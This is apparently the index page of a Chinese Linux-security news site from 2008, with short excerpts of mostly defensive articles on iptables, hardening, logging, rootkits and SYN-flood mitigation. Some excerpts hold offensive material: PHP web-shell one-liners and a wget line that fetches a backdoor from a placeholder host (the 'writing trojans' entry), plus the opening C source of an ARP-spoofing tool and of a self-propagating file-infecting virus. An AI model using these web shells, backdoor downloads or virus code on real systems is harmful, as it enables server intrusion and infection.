手机版
你好,游客 登录 注册 搜索
rss订阅 手机访问 
Linux安全
瑞星杀毒软件2007光盘零售版是面向 Linux的?

先来个评论:这是用Linux系统作为杀毒系统的,以前是把dos当作Windows杀毒系统,现在换成Linux了,估计是看好Linux的硬件支持和性能吧!

操作步骤

先将计算机启动顺序设为光盘启动(具体方法详见计算机的相关使用说明)

将瑞星杀毒软件 2007 版光盘放入光盘驱动器

日期:02/05/2008 12:03:21 作者:wheel
DDoS七种攻技术方式及相关防御

DDOS攻击是现在最常见的一种黑客攻击方式,下面就给大家简单介绍一下DDOS的七种攻击方式。

1.Synflood: 该攻击以多个随机的源主机地址向目的主机发送SYN包,而在收到目的主机的SYN ACK后并不回应,这样,目的主机就为这些源主机建立了大量的连接队列,而且由于没有收到ACK一直维护着这些队列,造成了资源的大量消耗而不能向正常请求提供服务。

日期:02/04/2008 19:00:57 作者:Linux
Linux系统下入侵工具Knark的简述与防范

  本文讨论了Linux系统下攻击者入侵成功以后常常使用的一些后门技术,并且对最着名的rootkit工具之一?knark进行了详细的分析,并且指出了在发现系统被入侵以后如何发现是否是kark及如何恢复。

  什么是"rootkit"?

  入侵者入侵后往往会进行清理脚印和留后门等工作,最常使用的后门创建工具就是rootkit。不要被名字所迷惑,这个所谓的“rootkit”可不是给超级用户root用的,它是入侵者在入侵了一太主机后,用来做创建后门并加以伪装用的程序包。这个程序包里通常包括了日志清理器,后门等程序。同时,程序包里通常还带有一些伪造的ps、ls、who、w、netstat等原本属于系统本身的程序,这样的话,程序员在试图通过这些命令查询系统状况的时候,就无法通过这些假的系统程序发觉入侵者的行踪。

日期:02/03/2008 20:22:13 作者:Linux
Linux操作系统预防病毒方案
也许你会问,Linux下防病毒是否是多余的?因为Linux本身具有抵抗病毒的能力.如果以非超级用户身份登录,一个恶意感染系统文件的程序将很难得逞.所以当我们看到使用Windows的朋友们要不辞辛劳地与美丽莎,切尔诺贝利,ExploreZip等病毒作斗争时,感到无比悲痛,因为我们丝毫不受这些病毒的威胁.然而,这种日子很快就要到头了,并不是由于Linux本身易受病毒感染,而是因为Linux要想得到企业的认可,就必须具备高度集成各种系统标准的能力,甚至要解决由其它操作系统引发的问题.
日期:02/02/2008 20:13:48 作者:little_linux
Ubuntu 7.10中iptables详述

 iptables详解

总览

用iptables -ADC 来指定链的规则,-A添加 -D删除 -C 修改

iptables - [RI] chain rule num rule-specification[option]

用iptables - RI 通过规则的顺序指定

日期:02/01/2008 14:08:32 作者:Linux
Linux系统中用iptables实现NAT
本文主要介绍如何使用iptbales实现Linux2.4下的强大的NAT功能。关于iptables的详细语法请参考“用iptales实现包过虑型防火墙”一文。需要申明的是,本文绝对不是 NAT-HOWTO的简单重复或是中文版,在整个的叙述过程中,作者都在试图用自己的语言来表达自己的理解,自己的思想。
日期:02/01/2008 14:07:10 作者:Linux
掌握Linux日志让系统更安全
Linux日志分析详细部分

  Linux日志也是用户应该注意的地方之一。不要低估日志文件对网络安全的重要作用,因为日志文件能够详细记录系统每天发生的各种各样的事件。用户可以通过日志文件检查错误产生的原因,或者在受到攻击和黑客入侵时追踪攻击者的踪迹。日志的两个比较重要的作用是:审核和监测。配置好的Linux的日志非常强大。对于Linux系统而言,所有的日志文件都在/var/log下。默认情况下,Linux的日志文件已经足够强大,但没有记录FTP的活动。用户可以通过修改/etc/ftpacess让系统记录FTP的一切活动。

日期:01/31/2008 20:09:59 作者:yangyun198
配置LIDS打造Linux内核安全入侵侦察系统

  LIDS( Linux入侵侦察系统)是Linux内核补丁和系统管理员工lidsadm),它加强了Linux内核。它在内核中实现了一种安全模式 -- 参考模式以及内核中的Mandatory Access Control(命令进入控制)模式。本文将阐述LIDS的功能和如何使用它来建立一个安全的Linux系统。

  为什么选择LIDS

  随着互连网上Linux越来越受欢迎 ,越来越多现有GNU/LINUX系统上的应用软件中的安全漏洞被发现。很多程序利用了程序员的粗心,例如缓存溢出、格式化代码攻击。当系统安全受到程序的危及,黑客获得ROOT权限以后,整个系统将被入侵者控制。

日期:01/30/2008 12:37:54 作者:Linux
设置Squid成功实现防盗链
Squid是一种用来缓冲Internet数据的软件。它是这样实现其功能的,接受来自人们需要下载的目标(object)的请求并适当地处理这些请求。也就是说,如果一个人想下载一web页面,他请求Squid为他取得这个页面。Squid随之连接到远程服务器(比如:http://squid.nlanr.net/)并向这个页面发出请求。然后,Squid显式地聚集数据到客户端机器,而且同时复制一份。当下一次有人需要同一页面时,Squid可以简单地从磁盘中读到它,那样数据迅即就会传输到客户机上。当前的Squid可以处理HTTP,FTP,GOPHER,SSL和WAIS等协议。但它不能处理如POP,NNTP,RealAudio以及其它类型的东西。
日期:01/29/2008 11:51:35 作者:Linux
Linux操作系统中必须知道的安全命令

虽然Linux相对于Windows系统来说安全的多,但对于很多习惯了Windows系统的管理员来讲,如何保证Linux操作系统安全、可靠将会面临许多新的挑战。本文将重点介绍Linux系统安全的命令。

passwd

1.作用

passwd命令原来修改账户的登陆密码,使用权限是所有用户。

2.格式

passwd [选项] 账户名称

3.主要参数

日期:01/28/2008 15:22:35 作者:Linux
运行 Apache 的 Linux服务器被神秘病毒感染

Linux公社消息:根据olidot报道,运行着 Linux/Apache 的服务器无意间被神秘病毒感染,数千电脑受影响的报告浮出水面,病毒利用 QuickTime, Yahoo! Messenger 和 Windows 的漏洞传播。

一个得知是否感染病毒的方法是看看你的电脑能否创建以数字开头的文件夹。

事件的细节现在仍然不是很多, 当前最好的建议是预先加强服务器安全。受感染服务器全新安装Linux系统,以保证安全!

日期:01/27/2008 12:11:39 作者:Linux
Linux环境下病毒类型总结

虽然目前来说,Linux环境下的病毒少之又少,但是还是有的,掌握一定的知识对我们来说只有好处!

1.感染ELF格式文件的病毒

这类病毒以ELF格式的文件为主要感染目标,通过汇编或者C语言可以写出能感染ELF文件的病毒。Lindose病毒就是一种能感染ELF文件的病毒,当它发现一个ELF文件时,将检查被感染的机器类型。如果查找到匹配的类型,则查找该文件中是否有一部分大于2784字节(或十六进制AEO),如果有,病毒就会用自身代码覆盖它并添加宿主文件的相应部分的代码,同时将宿主文件的入口点指向病毒代码部分。

日期:01/26/2008 18:39:09 作者:Linux
安全相关之Linux防火墙

ssh Linux ip 无法联接,man iptables检查是防火墙问题 便利用如下命令测试环境

1) 重启后生效

开启: chkconfig iptables on

关闭: chkconfig iptables off

2) 即时生效,重启后失效

日期:01/25/2008 16:24:42 作者:liuya1985li
安全教程 Linux下写入木马的方法解析

Linux下写入木马的方法:

(1)echo  '<?eval($cmd);?>' > /home/web/www/PREFIX/htdocs/mu.php

(2)echo "<?fputs(fopen('1.php','w+'),'<?eval($_POST[c]);?>');?>" >test11.php

(3)"system('wget http://xxxxxx.com/backdoor -P /tmp')"

日期:01/24/2008 16:52:38 作者:Linux
Linux操作系统安全之了解日志工具
Linux操作系统
日期:01/24/2008 08:29:58 作者:Linux
Linux系统的关机步骤与注意事项

在聊天时,一网友发来消息说Linux突然断电,数据没有保存,那么在企业中要怎么保证大家的数据保存到硬盘上了呢?这使我想到这个和windows的区别,当要关闭服务器的时候,如果有人连接到windows服务器上存取数据,windows会提示有人连接到当前的服务器,以方便我们通知用户做好保存数据的准备,那么Linux就没有这么的智能了,要我们自己人工提示用户。

关于Linux的关机步骤,大部分的用户以为就使用shutdown -h now就万事大吉了,其实Linux的关机也是一个值得大家注意的地方,下面来说一说关于关机过程中的一些要做的工做吧!

日期:01/23/2008 17:23:13 作者:Linux
Linux系统的一些安全配置 让你更放心

  由于Linux的开源,使得Linux强大功能的背后,总是有些不尽人意的地方,为了使Linux达到一个最安全的程度,还要不断的来对Linux配置要下一番功夫。

  所以一般要注意主机的包漏洞修补,放火墙的设置,关闭危险服务(端口)以及每日的日志分析.

  再这里我们以端口来讲述一下安全方面的问题

  什么是端口

日期:01/23/2008 17:16:39 作者:Linux
自己动手 让Linux操作系统更安全

  Linux系统比起Win来说更安全可靠,但是也并不是绝对安全的,通过以下几步,让你使用Linux操作系统的更放心。

  1.为LILO增加开机口令

  在/etc/lilo.conf文件中增加选项,从而使LILO启动时要求输入口令,以加强系统的安全性。具体设置如下:

  boot=/dev/hda

  map=/boot/map

  install=/boot/boot.b

  time-out=60 #等待1分钟

  prompt

  default=linux

  password=

  #口令设置

  image=/boot/vmlinuz-2.2.14-12

日期:01/22/2008 17:21:47 作者:Linux
保护Linux系统安全 应该尽早开始

    在操作系统中,大家感觉Windows漏洞很多,而Linux好像更安全些。当人们越来越热衷于寻找微软操作系统和软件的漏洞,使得Windows成为越来越多号称黑客的人攻击目标的时候,却往往忽略了世界上使用人数第二多的Linux操作系统。

    其实1996年就出现了Linux平台下的第一个病毒Staog。据说这个病毒是由澳大利亚一个叫做VLAD的黑客组织用汇编语言写出的(这个组织在病毒光荣簿上留下了相当辉煌的印记,Windows 95下的第一个病毒程序Boza就是该组织的作品)。它只感染二进制文件,试图通过三种途径得到root权限,但是它仍然只能算是一个病毒的演示样本,它存在的意义只是向那些Linux爱好者们证明:Linux并不是无坚不摧的,它同样也存在着被病毒侵袭的危险,只是由于Linux操作系统设计上的完善使得这种危险系数比较低而已。

日期:01/21/2008 16:33:21 作者:Linux
Linux下的杀毒软件为什么很少?

Linux下的杀毒软件为什么少之又少?早在2006年,一位开源爱好者在eweek上的一篇文章阐述了自己的观点。

首先,作者列出了一些人所列出的理由:

1.计算机病毒是不断产生的,这需要有专门的人员对最新的病毒进行分析,然后进行产品的升级。并且现在的病毒越来越复杂,而这个需要很大的人力,物力,而这一点上开源界不可能跟拥有专门的团队的商业软件所抗衡。

2.许多人认为防毒杀毒是一项太重要的任务,把这项任务交给开源软件,人们总是不放心。

日期:01/20/2008 15:04:13 作者:Linux
把Linux伪装成windows使系统更安全

说真的,Linux系统已经很安全了,为什么把linux伪装成windows这里就不再讨论了,就是为了“没有绝对的安全”。可以伪装Linux为windows的系统特性,叫外界的基本判断认为系统就是windows,至少是可以增加一些系统安全性的,呵呵。

网络上的计算机很容易被黑客利用工具或其它手段进行扫描,以寻找系统中的漏洞,然后再针对漏洞进行攻击。

通过伪装Linux系统,给黑客设置系统假象,可以加大黑客对系统的分析难度,引诱他们步入歧途,从而进一步提高计算机系统的安全性。下面以Red Hat Linux为例,针对几种黑客常用的途径介绍一些常用的Linux系统伪装的方法。

日期:01/19/2008 07:52:03 作者:Linux
家用防火墙发行版:pfsense 1.2 rc4发布
网络安全无处不在,打造一台家用等级的防火墙是不可避免的。其实pfSense可以做到的。pfSense是源自于m0n0wall的操作系统。它使用的技术包括Packet Filter,FreeBSD 6.x(或DragonFly BSD,假如ALTQ和CARP完成了的话)的ALTQ(以出色地支持分组队列),集成的包管理系统(以为其环境扩展新的特性)。
日期:01/17/2008 21:07:27 作者:Linux
Linux安全设置方面基础知识
  Linux相对于Windows具有天生的优势。但是,我们不管选择哪一种Linux发行版本,我们还是要做一些必要的设置,才能完全发挥Linux这种得天独厚的安全性。下面就通过几个步骤来加固的Linux服务器。目前,许多中小用户因业务发展,不断更新或升级网络,从而造成自身用户环境差异较大,整个网络系统平台参差不齐,在服务器端大多使用Linux和Unix的,PC端使用Windows和Mac。所以在企业应用中往往是Linux、Unix和Windows操作系统共存形成异构网络。
日期:01/16/2008 11:06:36 作者:Linux
Linux服务器的一些安全防范措施

假如站长的Linux服务器能被非受权用户接触到(比如服务器放在公用IDC机房内、公用办公室内),那么它就存在一些安全隐患。

使用单用户模式进入系统

Linux启动后出现boot:提示时,使用一个特殊的命令,如linuxsingle或linux 1,就能进入单用户模式(Single-User mode)。这个命令非常有用,比如忘记超级用户(root)密码。重启系统,在boot:提示下输入linux single(或linux 1),以超级用户进入系统后,编辑Passwd 文件,去掉root一行中的x 即可。

日期:01/15/2008 14:43:34 作者:Linux
Linux病毒为何少之又少

  看完以下两篇短文,大家或许会明白Linux操作系统上病毒为何少之又少。

  Linux是个人自主开发性很强的操作系统,例如:虽然同为一个红旗5核心,但因为每个用户的偏好和需要不同,因此可能会在它下面形成各不相同的用户管理方式、权限设制、软件包、软件编译命令、软件运行方式等等,形成了几乎没有机会存在两个完全相同的LINUX系统的大环境,杜绝了病毒的滋生条件。

  但Windows因为出于兼容性考虑,把所有应用程序的设置都代用户做完了,使用者只需按步就搬的选择安不安装这个操作系统、要还是不要这个程序、执不执行这个命令,造成了几乎所有计算机用户的运行环境类同孪生,营造了病毒生存的环境。

日期:01/14/2008 14:15:42 作者:Linux
Linux遭受SYN洪水攻击设置

SYN洪水攻击(SYN Flooding Attack)即是指利用了 TCP/IP 三次握手协议的不完善而恶意发送大量仅仅包含 SYN 握手序列数据包的攻击方式。该种攻击方式可能将导致被攻击计算机为了保持潜在连接在一定时间内大量占用系统资源无法释放而拒绝服务甚至崩溃。如果在Linux服务器下遭受SYN洪水攻击,可以进行如下一些设置:

#缩短SYN- Timeout时间:
iptables -A FORWARD -p tcp --syn -m limit --limit 1/s -j ACCEPT
iptables -A INPUT -i eth0 -m limit --limit 1/sec --limit-burst 5 -j ACCEPT

日期:01/14/2008 13:54:36 作者:Linux
开机自动清除Linux历史操作记录

Linux下如在终端里或是在文本方式操作时,只要按上下光标键可以快速调用以前的命令,可是这样其他人用同样的用户登录后也同样知道你的操作了。另外在Linux图形界面中,如GNOME,在面板的菜单上有打开最近文档这一选项,列出了最近的用户的所有使用的文件。如何清理这两种属性呢?

1)该属性分别归于不同的用户,只有相同的用户登录后才能使用以上的属性。

日期:01/13/2008 13:53:46 作者:Linux
编写Linux平台下ARP欺骗程序构造ARP数据包

自己学编写的一个基于Linux系统下的ARP欺骗程序,可以自己构造ARP欺骗数据包。可不要用在坏处啊。里面有两个执行文件ARPrequest和ARPresponse.

static int bigendian;

#include "arpdeceive.h"

/*命令行中所对应的长选项*/
struct option longopts[]=
{
 {"sha", required_argument, NULL, 'h'},
 {"sip", required_argument, NULL, 's'},
 {"dip", required_argument, NULL, 'd'},
 {"exclusive", required_argument, NULL, 'e'},
 {"interface", required_argument, NULL, 'i'},

日期:01/12/2008 15:50:12 作者:bantouxiaoxue2
Linux系统下ARP攻击的解决方案

最近我们公司的局域网的ARP病毒又流行了,Windows下的用户可以使用antiARP防火墙, 基本上能解决问题,可是喜欢Linux的兄弟姐妹们怎么办呢,我今天就遇到这个档子烦心事。

我用的是fedora core 6,我先把几个镜像文件挂上,用关键字 ARP 一搜,就搜到了ARPtables,和ARPwatcher 首先是ARPwatcher了,它好像只能监控本机ip/ARP地址的改变之类的,好像不能防止ARP攻击。 再一看ARPtables,立马想到了iptables,装上一看,果然,命令行都一模一样。 可是问题来了,保持本机不受ARP攻击很简单(用静态ARP绑定就可以了),但是人家网关也还是要受到攻击, 俺们又不是网络管理员,网关我只能 “远观而不能亵玩“!

日期:01/12/2008 15:39:58 作者:Linux
Linux下一个很简单的C病毒研究

整理了一个很简单的C病毒,切勿乱用,供大家研究!不过是unix/Linux环境的, 能看懂原理就OK了。

/* ucfree:2007-12-31 start */
#include <stdio.h>
#include <dirent.h>
#include <unistd.h>
#include <string.h>
#include <sys/stat.h>
#include <utime.h>
#define VIR_NAM        "virus.c"    // virus file name
#define BUF_SIZE    101
#define STA_PATH    "/"            // start path   

日期:01/11/2008 21:53:36 作者:k.eric
内容分类